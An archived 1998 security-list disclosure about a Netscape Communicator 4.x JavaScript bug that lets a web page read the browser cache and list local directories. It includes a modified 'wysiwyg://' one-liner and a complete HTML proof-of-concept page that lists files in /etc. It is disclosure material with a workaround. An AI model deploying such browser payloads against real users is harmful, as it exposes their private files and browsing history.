Lucene search
Packet StormPACKETSTORM:15241HistoryAug 17, 1999 - 12:00 a.m.
netscape.4.x-javascript-unix.txt
1999-08-1700:00:00
Packet Storm
packetstormsecurity.com
14
`Date: Thu, 29 Oct 1998 17:09:23 -0600
From: Ryan Gray <[email protected]>
To: [email protected]
Subject: Re: Javascript bug in Netscape Communicator 4.5
Hello,
Just wanted to add that Netscape Communicator 4.5b2 on Slackware
Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get
the script to read my cache. As for the local reading, with a little
modification, it'll do that to.
Example:
the line in George's script that reads local files is -
sl=window.open('wysiwyg://1/file:///c|/');
With just little change, taking the Linux directory structure into
consideration and adding proper backslash escapes -
sl=window.open('wysiwyg://1/file://\/');
That'll give you listing of '/' on the local box. (tsk, tsk, tsk)
Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife
-----------------------------------------------------------
Date: Thu, 29 Oct 1998 11:59:05 +0100
From: Willy TARREAU <[email protected]>
To: [email protected]
Subject: Re: Javascript bug in Netscape Communicator 4.5
>
> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading user's cache (the urls the user
> has
> visited, including the info in GET forms). Reading local directories
> content
> is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
it also works under Linux, and probably other Unixes as demonstrated by the
slightly modified copy I've made from your page which can be accessed at :
http://www-miaif.lip6.fr/willy/security/netscape.html
> Workaround: Disable Javascript.
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>
Willy
--
+----------------------------------------------------------------------------+
| Willy Tarreau - [email protected] - http://www-miaif.lip6.fr/willy/ |
| System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |
| Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |
+----------------------------------------------------------------------------+
-----------------------------------------------------------
There is a new bug in Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (probably others) which allows reading the user's cache (including the
info in GET forms.) Reading directories' contents is also possible. This information may be sent to an arbitrary host.
This page shows that this also works on Unix. It will show you the files in /etc.
Workaround: Disable Javascript.
-----------------------------------------------------------
<HTML>
<HEAD>
<TITLE>Browse directories with Netscape 4.5 </TITLE></HEAD>
<BODY>
<P>
There is a new bug in Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (probably others) which allows reading the user's cache (including the info in GET forms.)
Reading directories' contents is also possible. This information may be sent to an arbitrary host.
<BR>
This page shows that this also works on Unix. It will show you the files
in /etc.
<BR>
Workaround: Disable Javascript.
<BR>
<BR>
<SCRIPT>
sl=window.open('wysiwyg://1/file:///etc/');
sl2=sl.window.open();
sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some files in your /etc\"; for(i=1;i<6;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
sl2.location.reload();
</SCRIPT>
<BR>
<A HREF="http://www.geocities.com/ResearchTriangle/1711">
Go to Georgi Guninski's home page
</A>
<BR>
<A HREF="http://www-miaif.lip6.fr/willy/">
Go to Willy Tarreau's home page
</A>
</BODY>
</HTML>
`